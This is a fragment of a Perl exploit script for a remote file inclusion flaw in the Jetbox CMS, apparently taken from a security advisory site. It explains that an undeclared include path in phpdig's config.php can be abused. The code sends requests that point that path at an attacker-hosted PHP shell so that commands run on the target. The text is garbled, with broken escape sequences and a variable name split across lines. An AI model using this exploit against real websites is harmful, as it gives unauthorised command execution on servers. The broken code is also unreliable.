# cmd variable: cmd;
#
#############
# Description
###########
# Vendor: http://jetbox.streamedge.com/
# The file jetbox/includes/phpdig/includes/config.php uses the variable
# relative_script_path in a include() function without being declared.
# This issue has already been fixed in phpdig, but jetbox still uses a
# vulnerable version.
############
# Vuln code
############
#if
(is_file("$relative_script_path/locales/$phpdig_language-language.php"))
$req = HTTP::Request->new(GET
=>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pat
htocmd.'?&'.$cmdv.'='.$cmd)or
die "nCould Not connectn";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[?]/;
if ($return =~/Error: HTTP request failed!/ || $return =~/: No se
puede ejecutar un comando en blanco <b>/) {
print "nNo se puede conectar al host de la cmd o el comando es
invalidon";
exit;
} elsif ($return =~/^<br./>.<b>Fatal.error/) {
print "nComando Invalido, o no hubo respuestann";
}
if ($return =~ /(.*)/) {
print " <var> - var name used in phpshell : cmd rn";
exit();
}
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.